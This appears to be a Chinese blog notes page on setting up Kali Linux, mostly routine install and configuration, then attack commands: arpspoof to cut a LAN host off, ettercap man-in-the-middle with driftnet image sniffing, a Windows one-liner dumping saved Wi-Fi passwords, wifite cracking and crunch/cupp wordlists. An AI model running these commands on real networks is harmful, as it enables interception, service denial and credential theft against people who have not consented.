2.虚拟机安装镜像(报错:安装kali时提示无效的仓库镜像,尝试使用指定的debian仓库镜像时探测到错误。解决:退回上一级选择相反的操作)
3.安装VMware Tools
1.虚拟机按钮->vmware tools安装
2.解压/media/cdrom0 目录下的压缩包(tar -zxvf ****)
3.执行sudo ./vmware-install.pl
4.查看添加更新源
1.sudo vim /etc/apt/sources.list
2.添加
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
官方源:
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
3.sudo apt-get update &&sudo apt-get upgrade&&sudo apt-get full-upgrade&& sudo apt-get dist-upgrade
4.依赖错误:sudo apt-get remove libgcc-9-dev
5.apt-get install -y virtualbox-guest-x11
6.安装xorg(xfce4环境必备):sudo apt-get install xorg
7.安装Xfce4桌面环境:sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies
8.解决桌面环境乱码:sudo apt install ttf-wqy-zenhei
9.重启计算机:sudo reboot
5.升级内核(内核版本和头文件版本不一致):
查看内核版本:cat /proc/version或uname -r
查看内核头文件版本:apt-cache search linux-headers
apt-get update
apt-cache search linux-
apt-get install linux-image-5.6.0-kali2-amd64
执行上一句报错,依赖有问题:apt-get remove gcc-9-base
apt-get install linux-headers-5.6.0-kali2-amd64
reboot
sudo apt-get update &&sudo apt-get upgrade&&sudo apt-get full-upgrade&& sudo apt-get dist-upgrade
6.安装中文输入法
1.sudo apt-get update
2.sudo apt-get install ibus ibus-pinyin
3.sudo apt-get install zenity
4.im-config
5.cd ~
6.vi .bashrc
export GTK_IM_MODULE=ibus
export XMODIFIERS=@im=ibus
export QT_IM_MODULE=ibus
7.sudo reboot
7.kali中没有arpspoof,arpspoof是dsniff的一个工具
apt-get install dsniff
8.ARP常用命令
1.查看指定ip的arp:arp -a IP地址
2.配置指定arp:arp -s IP地址 物理地址
3.删除指定ip的arp:arp -d IP地址
4.查看所有arp:arp -a
5.删除所有arp:arp -d
(1).查看局域网所有IP:fping -g 本机IP地址/24
(2).让指定ip上不了网(ctrl+z停止):arpspoof -i eth0 -t 192.168.1.136 192.168.1.1
9.中间人
1.ettercap -G
https://blog.csdn.net/ysynhtt/article/details/39996933
2.kali中没有driftnet:apt-get install driftnet
3.图片嗅探:driftnet -i eth0
10.window查看连接过的wifi
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
11.dritfnet详细命令
-b 捕获到新的图片时发出嘟嘟声
-i interface 选择监听接口
-f file 读取一个指定pcap数据包中的图片
-p 不让所监听的接口使用混杂模式
-a 后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory 指定保存图片的路径
-x prefix 指定保存图片的前缀名
driftnet -i eth0 -a -d /home/mx/driftnet/ 后台抓取
12.chirp无线电拦截
13.kali 开启ssh服务
1.vi /etc/ssh/sshd_config
将#PasswordAuthentication no的注释去掉,并且将NO修改为YES
将PermitRootLogin without-password修改为PermitRootLogin yes
2.启动SSH服务:/etc/init.d/ssh start或service ssh start
3.查看SSH服务状态是否正常运行:etc/init.d/ssh status或者service ssh status
4.设置系统自动启动SSH服务:update-rc.d ssh enable
4.设置系统关闭自动启动SSH服务:update-rc.d ssh disabled
14.修改mac地址
ifconfig eth0 down
ifconfig eth0 hw ether 00:0c:29:b8:a8:8b
ifconfig eth0 up
15.防火墙
apt-get install ufw
ufw enable
ufw disable
开放端口:ufw allow 22/tcp
16.切换root用户:sudo su
17.wifite
查看usb是否连接:lsusb
查看wlan0是否存在:iwconfig
关闭无线网卡:ifconfig wlan0 down
修改无线网卡模式:iwconfig wlan0 mode monitor
开启无线网卡:ifconfig wlan0 up
指定密码字典:wifite --dict /home/mx/pwd.txt --kill
根据提示操作
18.密码字典
crunch(在指定目录下生成8-10位由指定字符生成的密码文件):crunch 8 10 jangmei.123 –o >> /home/mx/pwd.txt
cupp(社会工程学):
安装:apt-get install cupp
生成字典:cupp -i
根据提示操作
19.蓝牙
终端1:
service bluetooth start
rfkill unblock bluetooth
hciconfig hci0 up
bluetoothctl
power on
agent on
default-agent
scan on
service bluetooth start&&rfkill unblock bluetooth&&hciconfig hci0 up&&bluetoothctl &&power on&& agent on&&default-agent&&scan on
终端2:
(终端1:scan on后): rfcomm bind /dev/rfcomm1 5C:51:4F:FA:C0:2F(mac地址为终端1执行scan on命令的返回值)
cat /dev/rfcomm1
终端3:
释放:rfcomm release /dev/rfcomm1
网友评论